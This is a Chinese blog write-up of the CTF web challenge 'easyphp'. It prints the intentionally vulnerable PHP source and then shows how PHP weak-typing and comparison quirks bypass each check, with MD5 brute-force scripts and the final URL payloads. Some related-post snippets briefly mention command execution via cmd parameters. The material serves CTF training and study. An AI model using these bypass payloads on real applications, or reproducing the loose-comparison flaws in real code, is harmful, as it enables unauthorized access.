WEB:easyphp

最新推荐文章于 2023-10-29 17:43:14 发布
最新推荐文章于 2023-10-29 17:43:14 发布
阅读量493 收藏
点赞数
分类专栏: 攻防世界 文章标签: 前端 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gsumall04/article/details/131917452
版权

背景知识

        php弱类型比较

        MD5碰撞

题目

 进行代码审计

<?php
highlight_file(__FILE__);
$key1 = 0;//值赋值
$key2 = 0;
 
$a = $_GET['a'];//get方法获取值
$b = $_GET['b'];
 
if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3){
//a的值需要大于 6000000,同时也需要长度小于3
    if(isset($b) && '8b184b' === substr(md5($b),-6,6)){
//b的后六位md5值要等与8b184b
        $key1 = 1;
        }else{
            die("Emmm...再想想");
        }
    }else{
    die("Emmm...");
}
 
$c=(array)json_decode(@$_GET['c']);//接受json格式的字符串并将其转化为数组
if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){
//c为数组,is_numeric是php内置函数判断是否为数字,题中不要数字,m键值要大于2022
    if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){
        $d = array_search("DGGJ", $c["n"]);//数组中找DGGJ,如果没找到DGGJ,die
        $d === false?die("no..."):NULL;
        foreach($c["n"] as $key=>$val){
            $val==="DGGJ"?die("no......"):NULL;
        }//匹配n的一个键值若等于DGGJ直接die
        $key2 = 1;
    }else{
        die("no hack");
    }
}else{
    die("no");
}
 
if($key1 && $key2){
    include "Hgfks.php";
    echo "You're right"."\n";
    echo $flag;
}
 
?> Emmm...

 由上述代码可知

参数a

可用科学计数法绕过 a=1e9

if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3) //$a=1e9

参数b

编写MD5碰撞脚本得到b=53724

<?php
for ($i = 1; $i < 100000; $i++) {
     if('8b184b' === substr(md5($i),-6,6)){
         echo($i);
     }
}
?>

或者

import hashlib
  
for i in range(100000): 
    m = hashlib.md5() 
    m.update(str(i).encode()) 
    h = m.hexdigest() 
    if h[-6:] == "8b184b": 
        print(i)
        break

 参数c

要绕过is_numeric函数

可以使用%00绕过is_numeric函数

c={"m":"2033%00"}

绕过is_array和array_search函数

array_search保证非0下标元素含0就行,字符串转数字都是0

array_search()没有设置strict参数(如果该参数被设置为 TRUE,则函数在数组中搜索数据类型和值都一致的元素),我们就可以用0和DGGJ进行弱比较,0 == 'DGGJ'又0===='DGGJ'为false

即n的值中有0

c={"m":"2033%00","n":[[0,2],0]}
 
 
//对{"m":"2033%00","n":[[0,2],0]}进行url编码得到:
%7B%22m%22%3A%222033%2500%22%2C%22n%22%3A%5B%5B1%5D%2C0%5D%7D

构造payload

?a=1e9&b=53724&c=%7B%22m%22%3A%222033%2500%22%2C%22n%22%3A%5B%5B1%5D%2C0%5D%7D

或构造payload

?a=6e7&b=53724&c={"m":"2023a","n":[[],0]}

得到flag 

参考学习链接:

【愚公系列】2023年05月 攻防世界-Web(easyphp)-腾讯云开发者社区-腾讯云

攻防世界-easyphp_easyphp攻防世界_仲瑿的博客-CSDN博客

sleepywin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[CISCN2020]-easyphp
Keepb1ue的博客
08-21 6555
源码: <?php //题目环境:php:7.4.8-apache $pid = pcntl_fork(); if ($pid == -1) { die('could not fork'); }else if ($pid){ $r=pcntl_wait($status); if(!pcntl_wifexited($status)){ phpinfo(); } }else{
[xctf] 江苏工匠杯easyphp
YangYubo091699的博客
10-16 701
[xctf] 江苏工匠杯easyphp
羊城杯2020 Easyphp2
qq_53755216的博客
06-24 1097
随便刷一刷 随便总结一下 随便涨点姿势 二话不说先目录扫描 但是扫出来一堆429.。。。 看了一下dirsearch的readme 发现了以下参数 -s DELAY, --delay=DELAY Delay between requests emmm 真不错 重新来! 还是429 .。。。发现线程是30 .。。。 -t THREADS, --threads=THREADS Number of threads
easyphp攻防世界详细题解
最新发布
m0_74312676的博客
10-29 347
这array_search()在查找元素的时候是进行弱类型比较,而在PHP里字符串==0是成立的,即“DGGJ"==0是成立的,因此,要保证在c["n"]中有0,即可绕过array_search的判断。如果没有找到,则输出"no..."并终止执行。这是上述if条件的else部分,如果上述所有的条件检查都没有通过,那么会执行这里的代码,输出"no hack"并终止执行。这行代码的作用是在"n"键的数组中搜索"DGGJ"这个值,并返回其索引位置。的检查没有通过,那么会执行这里的代码,输出"no"并终止执行。
攻防世界 easyphp writeup
The_YSZL的博客
05-31 358
这个判断首先要求c是数组,然后要求c["m"]不是数字而c["m"]又要大于2022,显然,这两个条件相互矛盾,但是在php中,字符串和数字比较时,字符串会截取第一个字母前的数字来进行比较,所以只要让c["m"]=“2023a”即可(此处a可以任意替换为字母)。array_search的搜索过程中,使用的是“==”比较,所以“DGGJ”==0是成立的,因此,要保证在c["n"]中有0,即可绕过array_search的判断。所以c["n"] 要是一个数组,且长度为2,c["n"][0]也要是一数组。
EasyPHP
07-22
资源名称:EasyPHP工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片: 资源太大,传百度网盘了...
EasyPHP Devserver & Webserver-开源
04-18
EasyPHP Devserver和Webserver使用Devserver和Webserver进行主机开发PHP,Apache,MySQL,Nginx,PhpMyAdmin,Xdebug,PostgreSQL,MongoDB,Python,Ruby ...适用于Windows。 Devserver将安装一个完整且可立即使用...
EasyPHP.zip
07-11
EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件
EasyPHP5-3-14
07-22
资源名称:EasyPHP5-3-14工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片: 资源太大,传百度...
EasyPHP v5.4.4.zip
07-17
EasyPHP安装后默认为英文界面,用户可以更改成简体中文或其它语言,(在系统托盘上右击EasyPHP图标-configuration- EasyPHP-language处更改),实际上EasyPHP主要是一个本地性质的开发测试环境,EasyPHP并没有集成zend...
攻防世界 easyphp(md5强类型碰撞及其脚本)
rev1ve的博客
03-21 557
攻防世界easyphp md5强类型碰撞 python脚本爆破
【攻防世界】easyphp
RexHa的博客
02-01 4206
攻防世界 easyphp
web单身杯之easyphp
NYG694的博客
08-09 115
在liunx中除了普通的cat还有sed,这里面我们的目标其实是从中选取几行代码绕过给出的函数创建新文件,1.<?php组成这样一个文件,我们就可以通过传参随意浏览执行命令。这里要使用正则表达式的匹配首先在原文件中传参cmd=sed然后\是转义所以\|,这样子1.php就生成了,我们再访问当前地址1.php,然后进行传参cmd=echo "<??>">2.php访问2.php,用cmd=system('ls /')就可以读取了。
攻防世界web新手区easyphp题解writeup
weixin_46906325的博客
10-03 7087
攻防世界web新手区easyphp题解
攻防世界web新手-easyphp
yuanxu8877的博客
10-26 1209
攻防世界web新手-easyphp,php弱类型练手题目,值得一做。
CTF-江苏工匠杯easyphp 题解
百彦子烨的博客
11-04 3980
攻防世界-web新手区-江苏工匠杯-easyphp 题解
攻防世界 easyphp
qq_53105813的博客
12-13 946
攻防世界 wp
PHP弱类型
hackzkaq的博客
12-17 3983
`搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具` 一、PHP弱类型简介 弱类型简单来说就是数据类型可以被忽视的语言,和强类型语言的强制数据类型定义不同,弱类型可以一个变量赋不同数据类型的值 php虽然属于弱语言,但是里面也有一些强语言类型相关的强制定义数据类型的方法 比如php里的 == 和 === 之间的区别 == 为松散比较 只比较值,不比较数据类型 而 === 为严格比较,不仅比较值也比较类型,可以看作是强语言的强制数据类型要相同 二、PHP弱类型影响 具体表现在比如像一些数据验证
攻防世界ctf web easyphp题解wp
qq_41169485的博客
09-28 3697
第二步,用php代码编写MD5碰撞脚本得到b=53724。第五步,绕过array_search函数。第一步,用科学计数法绕过 a=1e9。第三步,绕过is_numeric函数。第四步,绕过is_array函数。一定要对传值url编码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值